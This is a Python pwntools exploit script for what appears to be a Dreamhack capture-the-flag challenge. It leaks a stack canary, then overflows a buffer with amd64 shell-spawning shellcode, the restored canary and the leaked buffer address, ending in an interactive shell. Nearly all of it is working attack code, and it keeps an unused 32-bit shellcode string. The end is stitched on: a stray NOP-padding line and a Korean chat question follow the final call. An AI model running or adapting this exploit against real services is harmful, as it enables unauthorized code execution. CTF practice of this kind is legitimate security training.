from pwn import*
# Offset from the start of the input buffer to the stack canary, as used by
# both stages below.
CANARY_OFFSET = 88

io = remote('host1.dreamhack.games', 23077)
context.arch = "amd64"

# pwntools' stock amd64 Linux "spawn a shell" stub, assembled for context.arch.
shellcode = asm(shellcraft.amd64.linux.sh())

# [0] The service announces the address of its input buffer. 14 characters
# are read and parsed as hex, which fits "0x" followed by 12 hex digits.
io.recvuntil("Address of the buf: ")
buf_addr = int(io.recv(14), 16)
print("Starting Buf address : ", hex(buf_addr))

# [1] Canary leak: send CANARY_OFFSET filler bytes plus one extra byte, then
# read the 7 bytes the service echoes right after the input.
# NOTE(review): presumably the extra byte replaces the canary's low NUL byte,
# so the echo runs on into the rest of the canary; that matches the
# b'\x00' + ... reconstruction below, but confirm against the target binary.
leak_probe = b'A' * CANARY_OFFSET + b'B'
io.sendlineafter('Input: ', leak_probe)
io.recvuntil(leak_probe)
canary_tail = io.recv(7)
canary = u64(b'\x00' + canary_tail)
print("Canary : ", hex(canary))

# [2] Second input, laid out by offset from the start of the buffer:
#   0   .. 87   shellcode, padded with filler up to the canary
#   88  .. 95   the leaked canary, written back unchanged
#   96  .. 103  8 filler bytes (presumably the saved frame pointer slot)
#   104 .. 111  the leaked buffer address (presumably the return address slot)
# NOTE(review): this only works if the target echoes unterminated input,
# discloses a stack address and has an executable stack; verify with checksec.
#
# Unused alternative kept from the original. These bytes use the 32-bit
# int 0x80 convention and do not match context.arch = "amd64":
#payload2 = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'
padding = b'A' * (CANARY_OFFSET - len(shellcode))
payload = b''.join([
    shellcode,
    padding,
    p64(canary),
    b'B' * 8,
    p64(buf_addr),
])
io.sendlineafter("Input: ", payload)
io.interactive()
payload += b'\x90'*(88-len(shellcode))
으로 한번 해보실래요?